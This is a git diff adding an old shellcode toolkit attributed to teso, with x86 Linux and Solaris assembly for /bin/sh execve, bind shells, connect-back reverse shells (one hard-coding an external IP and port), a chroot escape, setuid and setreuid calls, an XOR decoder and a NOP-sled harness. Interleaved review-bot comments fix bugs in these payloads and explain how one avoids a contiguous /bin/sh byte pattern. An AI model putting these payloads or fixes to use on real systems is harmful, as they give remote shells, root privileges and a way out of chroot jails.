(unsigned char *, + unsigned short int, unsigned short int); + +void +x86_linux_portshell_setup (unsigned char *, unsigned short int); + +void +x86_linux_connectshell_setup (unsigned char *, + unsigned long int, unsigned short int); + +#endif + diff --git a/other/shellkit/x86_linux.o b/other/shellkit/x86_linux.o new file mode 100644 index 0000000..d992733 Binary files /dev/null and b/other/shellkit/x86_linux.o differ diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS new file mode 100644 index 0000000..e5ad29f --- /dev/null +++ b/other/shellkit/x86_linux/AUTHORS @@ -0,0 +1,5 @@ +files by: +palmers / teso + +changed by: +lorian / teso 
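Review bot: `arch x86_linux` stores `NULL` in its nop-generator slot with a comment that the BSD function should be used instead, so any generic caller that invokes the arch's nop function through the table, without a special case for this entry, dereferences a null pointer; x86_bsd.c simply points the slot at `x86_nop`, and doing the same here (`x86_nop,` plus `#include "x86.h"`) removes the special case. `getxorer` duplicates the bad-byte list that `isLegal` already encodes, while `getxorer4` correctly calls `isLegal`; the two `switch` blocks should become `if (!isLegal (temp >> 8)) xor ^= 0x8000;` and `if (!isLegal (temp)) xor ^= 0x80;` so the list lives in one place. The `*_setup` functions report errors with `printf` to stdout whereas x86.c uses `fprintf (stderr, ...)`; they should do the same. `x86_linux_chmod_setup` leaves `mode` unused behind the `XXX: WRITE ME!` marker yet is exported through x86_linux.h, so callers get silently unchanged code; the header comment should say so until it is finished.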
diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s
new file mode 100644
index 0000000..63efd8b
--- /dev/null
+++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+ jmp file
+
+chmod:
+ xorl %eax, %eax
+ popl %ebx
+ movb %al, 0x4(%ebx)
+ movl $0x41414141, %ecx
+
+ movb $0xf, %al
+ int $0x80
+
+file:
+ call chmod
+ .ascii ""
+
+cend:
+
diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s
new file mode 100644
index 0000000..dd7e878
--- /dev/null
+++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* mkdir AA.. */
+ cdq
+ movl $0x73507350, %ecx
+ push %eax
+ push $0x2e2e4141
+ movl %esp, %ebx
+ movb $0x27, %al
+ int $0x80
+
+/* chroot AA.. */
+ movb $0x3d, %al
+ int $0x80
+
+/* chdir .. x 5 */
+ addb $0x2, %bl
+
+cd_loop:
+ incb %dl
+ movb $0xc, %al
+ int $0x80
+ cmp $0x6a, %dl
+ jne cd_loop
+
+/* chroot . */
+ incb %bl
+ movb $0x3d, %al
+ int $0x80
+cend:
+
diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump
new file mode 100644
index 0000000..fe9bb8e
Binary files /dev/null and b/other/shellkit/x86_linux/codedump differ
diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s
new file mode 100644
index 0000000..452a1d4
--- /dev/null
+++ b/other/shellkit/x86_linux/connect.s
@@ -0,0 +1,61 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* connect */ + movl $0x41414141, %ecx + xorl $0x4041413e, %ecx /* address: 127.0.0.1 */ + push %ecx + pushw $0x7450 + pushw %dx + movl %esp, %ecx + movl %eax, %edx + + push $0x10 + push %ecx + push %edx + movl %esp, %ecx + + movb $0x03, %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %edx, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve new file mode 100644 index 0000000..3a17d3f Binary files /dev/null and b/other/shellkit/x86_linux/execve differ diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s new file mode 100644 index 0000000..2fdb69f --- /dev/null +++ b/other/shellkit/x86_linux/execve.s @@ -0,0 +1,22 @@ +/* x86/linux execve /bin/sh shellcode + * + * lorian / teso + */ + + .globl cbegin + .globl cend + +cbegin: + pushl $0x0b + popl %eax + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s new file mode 100644 index 0000000..1fe28f6 --- /dev/null +++ b/other/shellkit/x86_linux/exit.s @@ -0,0 +1,14 @@ +/* x86/linux exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl cend + +cbegin: + + xorl %eax, %eax + incl %eax + int $0x80 + +cend: 
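Review bot: The `sockaddr_in` built for connect() has `sin_family` = 0 — `pushw %dx` pushes the `%edx` zeroed by `cdq` — whereas the Solaris connectsh.s in this same commit pushes `%bp` = 2 (AF_INET). As far as I can tell Linux's TCP connect path rejects any family other than AF_INET with EAFNOSUPPORT, and since the return value is never checked the code goes on to dup2() and execve() on an unconnected socket and fails silently. Replace `pushw %dx` with `pushw $0x2` (NUL-free, one byte longer); the bytes patched by x86_linux_connectshell_setup (`code[19..33]`, the address and port immediates) all precede this instruction, so those offsets stay valid, only the fragment length changes. A header comment listing the byte offsets of the address/port placeholders would keep the .s file and the C patcher in sync.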
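Review bot: In exit.s the exit status is whatever `%ebx` happens to hold, since nothing sets it before `int $0x80`; in a chained fragment that is the previous syscall's first argument (a string pointer, an fd), so the status is effectively random. If a defined status matters, `xorl %ebx, %ebx` before `incl %eax` costs two NUL-free bytes; otherwise the header comment should say the status is deliberately left undefined.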
diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s new file mode 100644 index 0000000..31aa68c --- /dev/null +++ b/other/shellkit/x86_linux/portshell.s @@ -0,0 +1,73 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s new file mode 100644 index 0000000..0d4c7b1 --- /dev/null +++ b/other/shellkit/x86_linux/portshell_slice.s 
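Review bot: Only fds 0 and 1 are redirected to the accepted socket; stderr stays wherever the exploited process had it, so the shell's error output never reaches the connection, while the Solaris bindshell.s in this commit dups 2, 1 and 0. A third dup2 after the second one — `incb %cl` / `movb $0x3f, %al` / `int $0x80` — fixes it and sits after every byte x86_linux_portshell_setup is likely to patch (the port immediate at `pushw $0x7350`), so only the fragment length changes. Note also that no return value is checked: if bind() fails (port in use, or below 1024 without privilege), listen() and accept() still succeed on an ephemeral port and the shell appears somewhere unpredictable; and the sockaddr is pushed with `sin_family` = 0 (`pushw %dx`), which Linux tolerates for bind() only together with INADDR_ANY — worth a comment so nobody copies the pattern into connect().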
@@ -0,0 +1,77 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx +/* push $0x68732F6E */ +/* push $0x69622F2F */ + pushw $0x6873 + pushw $0x2f6e + pushw $0x6962 + pushw $0x2f2f + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s new file mode 100644 index 0000000..870d125 --- /dev/null +++ b/other/shellkit/x86_linux/read.s @@ -0,0 +1,22 @@ + .globl cbegin + .globl cend + +cbegin: + jmp cend + +rrr: + movb $0xfa, %dl /* length */ + + popl %ecx /* position */ + + push $0x41 + pop %ebx + xorb $0x41, %bl + + push $0x3 + pop %eax + int $0x80 /* read */ + +cend: + call rrr + diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s new file mode 100644 index 0000000..0786804 --- /dev/null +++ b/other/shellkit/x86_linux/setgid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushb $0x2e + popl %eax + movw $0x4141, %ebx + xorw $0x4242, %ebx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s new file mode 100644 index 0000000..c976312 --- /dev/null +++ b/other/shellkit/x86_linux/setreuid.s 
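Review bot: portshell_slice.s is portshell.s line for line except that the two `push $imm32` of `//bin/sh` are split into four `pushw`, and nothing says why; a reader has to diff the two files to find the change and still cannot tell which byte pattern the split avoids (presumably a contiguous `/bin/sh`-style signature in the code — confirm). Add a header such as `/* portshell.s with the //bin/sh pushes split into 16-bit pushes so the string never appears contiguously; keep in sync with portshell.s */`, and ideally generate both from one source so a fix such as the missing stderr dup2 does not have to be applied twice.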
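Review bot: In read.s `movb $0xfa, %dl` sets only the low byte of the length argument, so `%edx` carries whatever its upper 24 bits held on entry and read() may be asked for far more than 250 bytes; nothing in the fragment zeroes `%edx` the way the socket fragments do with `cdq`. The layout is also suspect: after `int $0x80` the next instruction is `cend: call rrr`, which re-enters the read, so the bytes just read (placed right after the `call`) are never executed — xor.s solves the same problem by jumping over its `call`. Unless codedump.c (not in this hunk) treats the fragment differently, I would restructure it as below; no setup routine for read.s is declared in x86_linux.h, so there are no patch offsets to preserve.
```asm
cbegin:
	jmp down
rrr:
	xorl %edx, %edx		/* movb only sets %dl; the upper bytes would be inherited */
	movb $0xfa, %dl		/* length */
	/* … unchanged: popl %ecx (buffer = byte after the call), fd 0 in %ebx, $0x3 in %eax … */
	int $0x80		/* read */
	jmp done		/* skip the call so the bytes just read run next */
down:
	call rrr
done:
cend:
```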
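Review bot: In setgid.s the gid placeholder is only 16 bits (`movw $0x4141, %ebx` / `xorw $0x4242, %ebx`) and the upper half of `%ebx` is never cleared; this is correct only because 0x2e is the legacy 16-bit setgid syscall on i386, which ignores the upper bytes and cannot express gids above 65535 (x86_linux.h declares the parameter as `unsigned short int`, so the C side agrees, but nothing says so). A header comment would pin that: `/* setgid(gid) via the 16-bit syscall 46; gid is stored as 0x4141 ^ 0x4242 and rewritten by x86_linux_setgid_setup (which bytes it patches is not visible here) */`. Also, a `w` suffix with a 32-bit register operand is assembler-dependent at best; writing `%bx` says what is meant and guarantees the 4-byte `66 bb 41 41` encoding the patcher presumably relies on.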
@@ -0,0 +1,16 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushl $0x46
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4141, %ebx
+ movw $0x4242, %ecx
+ xorw $0x4242, %ecx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s
new file mode 100644
index 0000000..e78410a
--- /dev/null
+++ b/other/shellkit/x86_linux/setuid.s
@@ -0,0 +1,14 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+main:
+ pushb $0x17
+ popl %eax
+ movw $0x4141, %ebx
+ xorw $0x4242, %ebx
+ int $0x80
+
+cend:
+
diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_linux/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s
new file mode 100644
index 0000000..29e3b78
--- /dev/null
+++ b/other/shellkit/x86_linux/xor.s
@@ -0,0 +1,24 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp XOR_down
+
+XOR_up:
+ popl %ebx
+ movb $0x26, %cl /* lenght */
+
+XORLoop:
+ xorb $0x64, %bl /* xor key */
+ incl %ebx
+ dec %cl
+ jnz XORLoop
+ jmp XORLoopDone
+
+XOR_down:
+ call XOR_up
+
+XORLoopDone:
+ .ascii ""
+
+cend:
diff --git a/other/shellkit/x86_noptest.c b/other/shellkit/x86_noptest.c
new file mode 100644
index 0000000..3c68ce0
--- /dev/null
+++ b/other/shellkit/x86_noptest.c
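Review bot: In setreuid.s both immediates equal their XOR keys (`0x4141 ^ 0x4141`, `0x4242 ^ 0x4242`), so as committed the fragment always calls setreuid(0, 0) and only the patcher (not in this hunk) can make it anything else; the header should say which bytes are rewritten. 0x46 is the 16-bit setreuid syscall on i386, so, as in setuid.s/setgid.s, ids above 65535 cannot be expressed and the uncleared upper halves of `%ebx`/`%ecx` are ignored by the kernel — worth one comment line, since a future switch to the 32-bit syscall (0xcb) would need `movl` and a different, NUL-prone encoding.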
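Review bot: setuid.s uses the same placeholder scheme as setgid.s (`0x4141 ^ 0x4242` in the low 16 bits of `%ebx`, upper half never cleared) and is again correct only because 0x17 is the 16-bit setuid syscall on i386; there is no header comment saying so, and the `main:` label is defined but never referenced. Add the same explanatory header as setgid.s, and prefer `%bx` over `%ebx` with the `w` suffix so the encoding — and therefore the patch offsets — does not depend on the assembler's leniency.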
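Review bot: In spset.s the search restarts the 512-byte count on every marker hit (`je a`), so `%esp` ends up 512 bytes above the *last* occurrence of `0x12345678` it walks over — and the little-endian immediate of `movl $0x12345678, %eax` at the start of this very fragment is such an occurrence if the walk begins below it; worth a comment either way. The loop also assumes `cdq` clears `%edx`, which holds only because `%eax` has just been loaded with a non-negative value, and it reads 512 bytes beyond the marker unconditionally (byte-granular `popl`/`pushl`/`incl %esp`), which faults if the top of the stack is closer than that. I would extend the header with: `/* edx = 512 via cdq (eax >= 0) + dh; the count restarts at each marker, so the final esp is 512 bytes past the last marker seen, possibly this block's own immediate */`.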
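Review bot: The xor.s decoder never touches the payload: `xorb $0x64, %bl` XORs the low byte of the pointer register, not the byte it points to, so the loop corrupts `%ebx` on every iteration and then falls into still-encoded data at `XORLoopDone`. The intended instruction is `xorb $0x64, (%ebx)`, which is also three NUL-free bytes (`80 33 64`), so the fragment length is unchanged. The length (0x26) and key (0x64) are baked in and x86_linux.h declares no xor setup routine, so the header should say how (or whether) a caller is expected to patch them; the comment typo `lenght` should read `length`.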
@@ -0,0 +1,25 @@
+
+#include
+#include
+#include "shellcode.h"
+#include "x86_bsd.h"
+
+
+typedef void (* func_ptr)(void);
+
+int
+main (int argc, char *argv[])
+{
+ func_ptr fp;
+ unsigned char nopspace[20480];
+
+ x86_nop (nopspace, sizeof (nopspace), "\x25\x0d\x0a\x00", 4);
+ nopspace[sizeof (nopspace) - 1] = '\xcc';
+
+ fp = (func_ptr) nopspace;
+ fp ();
+
+ exit (EXIT_SUCCESS);
+}
+
+
diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README
new file mode 100644
index 0000000..da1d06b
--- /dev/null
+++ b/other/shellkit/x86_solaris/README
@@ -0,0 +1,7 @@
+x86/solaris shellcodes
+
+lorian/teso
+
+all shellcodes are untested for now, cause i dont have a solaris x86
+system to test on. could be that they all dont work...
+will test as soon i install solaris x86 at home... (maybe within next week)
diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
+/* x86/BSD bindsh shellcode (89 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %ebx, %ebx
+ mull %ebx
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %ecx
+
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ movb $0xe6, %al
+ call *%ecx
+
+ xchgl %esi, %eax
+ pushl %edx
+ pushw $0x4444
+ pushw %bx
+ movl %esp, %ebp
+ pushl $0x10
+ pushl %ebp
+ pushl %esi
+ xorl %eax, %eax
+ movb $0xe8, %al
+ call *%ecx
+ movb $0xe9, %al
+ call *%ecx
+ pusha
+ popl %edi
+ movb $0xea, %al
+ call *%ecx
+a:
+ pushl %ebx
+ pushl %eax
+ movb $0x3e, %al
+ call *%ecx
+ decl %ebx
+ jns a
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %edi
+ pushl %edx
+ pushl %edi
+ pushl %ebx
+ movb $0x3b, %al
+ call *%ecx
+
+_cend:
+cend:
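Review bot: x86_noptest.c executes `nopspace`, a stack buffer, by casting it to a function pointer, so it only runs where the stack is executable (no NX / `-z execstack`), and it ends by hitting the `0xcc` written into the last byte, i.e. the process dies with SIGTRAP and `exit (EXIT_SUCCESS)` is never reached — a passing run looks like a crash. Write `0xc3` (`ret`) instead of `0xcc` so `fp ()` returns into main and exit is reached (assuming x86_nop's filler leaves `%esp` balanced), or at least comment that SIGTRAP is the expected outcome, and consider building the sled in an `mmap(PROT_READ|PROT_WRITE|PROT_EXEC)` region so the harness does not depend on the binary's stack flags. The two bare `#include` lines look like stripped `<stdio.h>`/`<stdlib.h>`, and the file includes x86_bsd.h although it is named as a generic x86 test — confirm both against the repository.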
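Review bot: The bindshell.s header says `x86/BSD bindsh shellcode` but the file lives in x86_solaris/ and, like its siblings, builds the Solaris `lcall $0x7, $0` / `ret` gate on the stack (`0x3cfff8ff` inverted plus `0x9a`) and uses Solaris syscall numbers (0xe6 socket, 0xe8 bind, 0xe9 listen, 0xea accept); change the first line to `/* x86/solaris bindsh shellcode (89 bytes)`. Two things to check before the README's "untested" caveat is lifted: the redirect loop at `a:` issues syscall 0x3e (fcntl) with `%ebx` = 2, 1, 0 as the second argument, which as far as I can tell are F_SETFD/F_GETFD/F_DUPFD rather than F_DUP2FD, and `movb $0x3e, %al` overwrites only the low byte of `%eax`, which at that point holds the accepted fd, so the syscall number is right only while that fd is below 256 — true in practice, but worth a comment.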
diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s
new file mode 100644
index 0000000..155015a
--- /dev/null
+++ b/other/shellkit/x86_solaris/connectsh.s
@@ -0,0 +1,60 @@
+/* x86/solaris connectsh shellcode (83 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %ebp, %ebp
+ mull %ebp
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %ecx
+
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ movb $0xe6, %al
+ call *%ecx
+ xchgl %esi, %eax
+ pushl $0xcab058c3
+ pushw $0x4444
+ pushw %bp
+ movl %esp, %edi
+ pushl $0x10
+ pushl %edi
+ pushl %esi
+ xorl %eax, %eax
+ movb $0xeb, %al
+ call *%ecx
+a: pusha
+ pop %esi
+ movb $0x3e, %al
+ call *%ecx
+ decl %ebp
+ jns a
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %edi
+ pushl %edx
+ pushl %edi
+ pushl %ebx
+ movb $0x3b, %al
+ call *%ecx
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s
new file mode 100644
index 0000000..428a2fe
--- /dev/null
+++ b/other/shellkit/x86_solaris/execve.s
@@ -0,0 +1,32 @@
+/* x86/solaris execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %eax, %eax
+ cdq
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %edi
+
+ movb $0x3b, %al
+ pushl %edx
+ push $0x68732F6E
+ push $0x69622F2F
+ movl %esp, %ebx
+ pushl %edx
+ pushl %ebx
+ movl %esp, %ecx
+ pushl %edx
+ pushl %ecx
+ pushl %ebx
+ call *%edi
+
+cend:
diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s
new file mode 100644
index 0000000..d332c6f
--- /dev/null
+++ b/other/shellkit/x86_solaris/exit.s
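Review bot: The peer in connectsh.s is a baked-in immediate (`pushl $0xcab058c3` lays down the bytes c3 58 b0 ca, i.e. 195.88.176.202, and `pushw $0x4444` is port 17476) and, unlike the Linux connect.s, no setup routine that rewrites those bytes is visible; at minimum the header should give the two byte offsets to patch. The connect() result in `%eax` is never examined before the fcntl loop and execve(), so a refused connection still yields a shell attached to a dead socket. The loop at `a:` also passes `%ebp` = 2, 1, 0 as the fcntl command, which is not F_DUP2FD on Solaris as far as I can tell — the same question as in bindshell.s, and one the README's "untested" note makes worth settling first.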
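Review bot: The Solaris execve.s assembles the `lcall $0x7, $0` / `ret` gate on the stack and enters it with `call *%edi`, so the fragment only works where the stack is executable — Solaris/x86 of that era allowed it by default, but `noexec_user_stack` turns it into a SIGSEGV; the header should state the assumption. The `0x3cfff8ff` + `notl` dance and `0x9a` deserve one comment line as well, e.g. `/* builds 9a 00 00 00 00 07 00 c3 = lcall $7,$0; ret on the stack without NUL bytes in the code */`, since the sequence is repeated in all four Solaris files with no explanation.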
@@ -0,0 +1,24 @@
+/* x86/solaris exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+ movl $0x3cfff8ff, %eax
+ notl %eax
+ pushl %eax
+ xorl %eax, %eax
+ movb $0x9a, %al
+ pushl %eax
+ movl %esp, %edi
+ movb $0x01, %al
+ call *%edi
+
+
+_cend:
+cend:
-- cgit v1.3
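Review bot: The exit status handed to the kernel is whatever dword sits above the return address pushed by `call *%edi`, and here that is the first dword of the gate itself (`0x0000009a`), so — if I read the Solaris argument layout right — the process exits with status 154 rather than 0. If a clean status matters, push a zero argument between building the gate and the call, e.g. `xorl %ebx, %ebx` / `pushl %ebx` after `movl %esp, %edi` (`%edx` is not known to be zero here, unlike the siblings that use `mull`/`cdq`); otherwise document the undefined status in the header.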